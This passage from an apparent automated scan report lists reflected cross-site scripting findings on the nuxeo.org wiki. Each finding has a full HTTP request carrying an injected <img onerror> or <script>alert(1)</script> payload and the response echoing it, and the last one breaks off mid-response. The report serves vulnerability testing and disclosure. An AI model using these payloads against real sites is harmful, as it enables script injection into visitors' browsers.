Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Vary: Accept-Encoding
Connection: close
Content-Length: 46232


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Support Forums : Forum Home</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/discussions/style/style.jsp?d3ade"><script>alert(1)</script>c594b43b6bf=1" />
...[SNIP]...

4.434. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f83de"><img%20src%3da%20onerror%3dalert(1)>5f41d66ee78 was submitted in the REST URL parameter 4. This input was echoed as f83de"><img src=a onerror=alert(1)>5f41d66ee78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Mainf83de"><img%20src%3da%20onerror%3dalert(1)>5f41d66ee78/WebHome HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12858
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainf83de%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5f41d66ee78/WebHome?format=xar&amp;name=Mainf83de"><img src=a onerror=alert(1)>5f41d66ee78.WebHome&amp;pages=Mainf83de">
...[SNIP]...

4.435. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a777f<img%20src%3da%20onerror%3dalert(1)>bb226e90ef6 was submitted in the REST URL parameter 4. This input was echoed as a777f<img src=a onerror=alert(1)>bb226e90ef6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Maina777f<img%20src%3da%20onerror%3dalert(1)>bb226e90ef6/WebHome HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:54 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12792
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina777f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebb226e90ef6/">Maina777f<img src=a onerror=alert(1)>bb226e90ef6</a>
...[SNIP]...

4.436. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f6f73<img%20src%3da%20onerror%3dalert(1)>f496e7fa5ac was submitted in the REST URL parameter 5. This input was echoed as f6f73<img src=a onerror=alert(1)>f496e7fa5ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Main/WebHomef6f73<img%20src%3da%20onerror%3dalert(1)>f496e7fa5ac HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12801
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebHomef6f73%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef496e7fa5ac'>WebHomef6f73<img src=a onerror=alert(1)>f496e7fa5ac</a>
...[SNIP]...

4.437. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8f16"><img%20src%3da%20onerror%3dalert(1)>124352d5031 was submitted in the REST URL parameter 5. This input was echoed as c8f16"><img src=a onerror=alert(1)>124352d5031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Main/WebHomec8f16"><img%20src%3da%20onerror%3dalert(1)>124352d5031 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12863
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebHomec8f16%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E124352d5031?format=xar&amp;name=Main.WebHomec8f16"><img src=a onerror=alert(1)>124352d5031&amp;pages=Main.WebHomec8f16">
...[SNIP]...

4.438. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e3ebd<img%20src%3da%20onerror%3dalert(1)>55b90c707ba was submitted in the REST URL parameter 4. This input was echoed as e3ebd<img src=a onerror=alert(1)>55b90c707ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skinse3ebd<img%20src%3da%20onerror%3dalert(1)>55b90c707ba/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12813
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/skinse3ebd%3Cimg+src%3Da+onerror%3Dalert%281%29%3E55b90c707ba/">skinse3ebd<img src=a onerror=alert(1)>55b90c707ba</a>
...[SNIP]...

4.439. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef32"><img%20src%3da%20onerror%3dalert(1)>d71e73a5f1d was submitted in the REST URL parameter 4. This input was echoed as fef32"><img src=a onerror=alert(1)>d71e73a5f1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skinsfef32"><img%20src%3da%20onerror%3dalert(1)>d71e73a5f1d/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12879
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skinsfef32%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed71e73a5f1d/toucan?format=xar&amp;name=skinsfef32"><img src=a onerror=alert(1)>d71e73a5f1d.toucan&amp;pages=skinsfef32">
...[SNIP]...

4.440. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41c04<img%20src%3da%20onerror%3dalert(1)>a6287896c27 was submitted in the REST URL parameter 5. This input was echoed as 41c04<img src=a onerror=alert(1)>a6287896c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skins/toucan41c04<img%20src%3da%20onerror%3dalert(1)>a6287896c27 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12801
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/skins/toucan41c04%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea6287896c27'>toucan41c04<img src=a onerror=alert(1)>a6287896c27</a>
...[SNIP]...

4.441. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a4f"><img%20src%3da%20onerror%3dalert(1)>9a7616758c8 was submitted in the REST URL parameter 5. This input was echoed as 68a4f"><img src=a onerror=alert(1)>9a7616758c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skins/toucan68a4f"><img%20src%3da%20onerror%3dalert(1)>9a7616758c8 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12863
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skins/toucan68a4f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9a7616758c8?format=xar&amp;name=skins.toucan68a4f"><img src=a onerror=alert(1)>9a7616758c8&amp;pages=skins.toucan68a4f">
...[SNIP]...

4.442. http://www.nuxeo.org/xwiki/bin/login/XWiki/XWikiLogin [xredirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/login/XWiki/XWikiLogin

Issue detail

The value of the xredirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e135"><script>alert(1)</script>f943fd1f5a1 was submitted in the xredirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xwiki/bin/login/XWiki/XWikiLogin?xredirect=http%3A%2F%2Fwww.nuxeo.org%2Fxwiki%2Fbin%2Fview%2FMain%2F3e135"><script>alert(1)</script>f943fd1f5a1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 401 Unauthorized
Date: Mon, 15 Nov 2010 14:17:10 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13229
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<input type="hidden" name="xredirect" value="http://www.nuxeo.org/xwiki/bin/view/Main/3e135"><script>alert(1)</script>f943fd1f5a1" />
...[SNIP]...

4.443. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 458d1<img%20src%3da%20onerror%3dalert(1)>8dd7e8dd01c was submitted in the REST URL parameter 4. This input was echoed as 458d1<img src=a onerror=alert(1)>8dd7e8dd01c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki458d1<img%20src%3da%20onerror%3dalert(1)>8dd7e8dd01c/Register HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13999
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki458d1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8dd7e8dd01c/">XWiki458d1<img src=a onerror=alert(1)>8dd7e8dd01c</a>
...[SNIP]...

4.444. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63e7a"><img%20src%3da%20onerror%3dalert(1)>c726e3e58ec was submitted in the REST URL parameter 4. This input was echoed as 63e7a"><img src=a onerror=alert(1)>c726e3e58ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki63e7a"><img%20src%3da%20onerror%3dalert(1)>c726e3e58ec/Register HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 14065
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki63e7a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec726e3e58ec/Register?format=xar&amp;name=XWiki63e7a"><img src=a onerror=alert(1)>c726e3e58ec.Register&amp;pages=XWiki63e7a">
...[SNIP]...

4.445. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7501a"><img%20src%3da%20onerror%3dalert(1)>a1cd787231b was submitted in the REST URL parameter 5. This input was echoed as 7501a"><img src=a onerror=alert(1)>a1cd787231b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki/Register7501a"><img%20src%3da%20onerror%3dalert(1)>a1cd787231b HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:53 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 14049
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
